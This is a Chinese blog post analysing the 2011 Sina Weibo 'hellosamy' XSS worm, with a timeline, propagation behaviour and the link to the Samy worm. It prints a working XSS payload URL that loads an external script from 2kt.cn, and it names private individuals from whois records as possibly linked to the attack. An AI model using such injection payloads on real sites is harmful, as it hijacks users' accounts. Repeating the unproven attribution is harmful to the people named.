一、事件的经过

新浪微博突然出现大范围“中毒”,大量用户自动发送“建党大业中穿帮的地方”、“个税起征点有望提到4000”、“郭美美事件的一些未注意到的细节”、“3D肉团团高清普通话版种子”等带链接的微博与私信,并自动关注一位名为hellosamy的用户。

事件的效果:


事件的经过线索如下:

20:14,开始有大量带V的认证用户中招转发蠕虫
20:30,2kt.cn中的病毒页面无法访问
20:32,新浪微博中hellosamy用户无法访问
21:02,新浪漏洞修补完毕

影响有多大:32961(这位hellosamy在帐号被封前的好友数量)。

二、采用了什么样的***方法

1、利用了新浪微博存在的XSS漏洞;

2、使用有道提供的短域名服务(这些网址目前已经“无害”);

例如,通过http://163.fm/PxZHoxn,将链接指向:
http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/p_w_picpaths/t.js%3E%3C/script%3E?type=update

3、当新浪登陆用户不小心访问到相关网页时,由于处于登录状态,会运行这个js脚本做几件事情:

a.发微博(让更多的人看到这些消息,自然也就有更多人受害);
b.加关注,加uid为2201270010的用户关注——这应该就是大家提到的hellosamy了;
c.发私信,给好友发私信传播这些链接;

三、***者是谁?

***者不一定是2kt.cn的拥有者。目前暂时只能获得2kt.cn域名、网站拥有者信息如下。
不排除这个网站被***后,服务器被人放置恶意代码。

通过whois查询,2kt.cn的域名拥有者信息如下:

注册人: 张志
管理员邮件:lin5061@gmail.com

通过工信部的备案查询:http://www.miibeian.gov.cn/publish/query/indexFirst.action

网站负责人姓名:刘孝德
网站备案/许可证号:苏ICP备10108026号-1

四、为什么叫hellosamy?

2005年,首个利用跨站点脚本缺陷的蠕虫samy被“创造”出来了。Samy利用网站设计方面的缺陷,创建了一份“恶意”的用户档案,当该用户档案被浏 览时,就会自动地激活代码,将用户添加到Samy的“好友”列表中。另外,恶意代码还会被拷贝到用户的档案中,当其他人查看用户的档案时,蠕虫会继续传 播。Samy蠕虫能够造成与拒绝服务相当的效应,会造成好友列表中好友数量呈指数级增长,最终会消耗系统的大量资源。

因此,这次新浪微博的蠕虫,象是在对samy蠕虫致敬

五、参考信息

samy蠕虫的传播经历与技术细节:http://namb.la/popular,http://namb.la/popular/tech.html
新浪hellosamy蠕虫的传播与细节:http://bbs.unnoo.com/forum.php?mod=viewthread&tid=156&fromuid=2

六、本次蠕虫事件中的代码下载

t.js下载地址: 06.28_sina_XSS.txt.zip (1.41 KB, 下载次数: 223)

转载于:https://blog.51cto.com/ynhu33/598851

新浪微博***事件分析相关推荐

  1. 产品需求分析与市场分析方法汇总(SWOT+PDCA+波士顿矩阵BCG+5W2H分析法+STAR关键事件分析法+目标管理SMART+时间管理紧急重要矩阵+WBS任务分解法)

    产品需求分析与市场分析方法汇总(SWOT+PDCA+波士顿矩阵BCG+5W2H分析法+STAR关键事件分析法+目标管理SMART+时间管理紧急重要矩阵+WBS任务分解法) 产品需求分析与市场分析方法汇 ...

  2. Mocha BSM产品亮点——关联事件分析

    业务需求与挑战 企业经常会遇到下列场景: • 企业某应用,例如,WebSphere Portal Server,已经不可用,是由于应用自身已不可用?还是应用所连接的数据库出了问题?还是应用的LDAP服 ...

  3. 重新定义分析 - EventBridge实时事件分析平台发布

    作者:肯梦 对于日志分析大家可能并不陌生,在分布式计算.大数据处理和 Spark 等开源分析框架的支持下,每天可以对潜在的数百万日志进行分析. 事件分析则和日志分析是两个完全不同的领域,事件分析对实时 ...

  4. 选了combobox里的选项后没激发change事件_stata 事件分析法

    前言: 因为一些原因,国庆节期间学的.学习过程很酸爽,自己并没有很多统计学及其相关软件的经验,网上相关资料也不是很多.我在微信公众号.知网.经管之家.B站.百度文库等很多平台找了各式的资料来学(花了7 ...

  5. 针对巴基斯坦的某APT活动事件分析

    本文讲的是针对巴基斯坦的某APT活动事件分析, 事件背景 2017年6月,360威胁情报中心发现了一份可疑的利用漏洞执行恶意代码的Word文档,经过分析后,我们发现这有可能是一起针对巴基斯坦的政府官员 ...

  6. 跨浏览器resize事件分析

    resize事件 原生事件分析 window一次resize事件: IE7 触发3次, IE8 触发2次, IE9 触发1次, IE10 触发1次 Chrome 触发1次 FF 触发2次 Opera ...

  7. 【权威发布】360天眼实验室:Xshell被植入后门代码事件分析报告(完整版)

    本文由 安全客 原创发布,如需转载请注明来源及本文地址. 本文地址:http://bobao.360.cn/learning/detail/4278.html 文档信息 事件概要 事件简述 近日,非常 ...

  8. TeamViewer疑似被入侵事件分析

    近期,在网络上曝出"TeamViewer公司被入侵,任何TeamViewer用户都有被入侵的风险"的新闻.白帽汇安全研究院在得知后迅速对整起事件进行跟踪分析,经过分析确认此次事件并 ...

  9. Kaggle(Gun Violence Data)—美国枪支暴力事件分析(1)和(2)

    Kaggle(Gun Violence Data)-美国枪支暴力事件分析(1) 数据来源为kaggle:https://www.kaggle.com/jameslko/gun-violence-dat ...

最新文章

  1. 台湾国立大学郭彦甫Matlab教程笔记(21)linear equations(高斯消去法和追赶法)
  2. 工作136:eachrt
  3. c语言 %15s,c语言求助
  4. ICCV2021 Oral-TAUFacebook提出了通用的Attention模型可解释性
  5. deep linux 看视频卡,在Deepin 20等Linux系统下用Chrome看虎牙直播经常卡的处理
  6. python爬取网页实时数据_使用 Python 爬取网页数据
  7. Fedora Linux虚拟机常用开发工具
  8. Python之logging模块
  9. 最长公共子序列lcs 51nod1006
  10. POJ 1166 The Clocks
  11. 显示已暂停_美国大学这类研究生项目真的要凉?盘点美国暂停招生的研究生项目~...
  12. 计算器是不是电子计算机,计算器和计算机的区别?
  13. MapGuide Maestro 3.0发布
  14. Python 汉字转拼音的库--- PyPinyin
  15. 避免360浏览器极速模式自动填充表单
  16. CAN总线的CRC校验
  17. 简单破解 Sencha Architect 2.2 (ExtJs Designer) - 李路平 - 博客园
  18. windows11-USB禁用
  19. 2015-10-17
  20. [pillow]透明图片和不透明图片叠加合成--添加透明度

热门文章

  1. 大数据_Hbase-原理说明_大数据存储_垂直拆表_水平拆表_动态列扩展---Hbase工作笔记0003
  2. 微服务升级_SpringCloud Alibaba工作笔记0001---新一代网关spring gateway和zuul的关系说明
  3. Netty工作笔记0045---异步模型原理剖析
  4. STM32工作笔记0051---NVIC中断优先级管理
  5. springcloud工作笔记095---springcloud项目后端验证_hibernate validator后端校验字段_自己实现_快速开发
  6. mybatis工作笔记002_mybatis中如果返回的结果没有的话默认返回null的list_但可启用returnInstanceForEmptyRow_返回为list不为null但为0条
  7. IntelliJ Idea学习笔记004--- idea修改格式化代码快捷键_顺带一个激活地址_以及常用快捷键
  8. PostGreSql学习笔记002---Navicat Premium中管理PostGreSql 错误:字段rolcatupdate 不存在
  9. fastadmin添加定时任务
  10. hdfs 指令_Hadoop Shell命令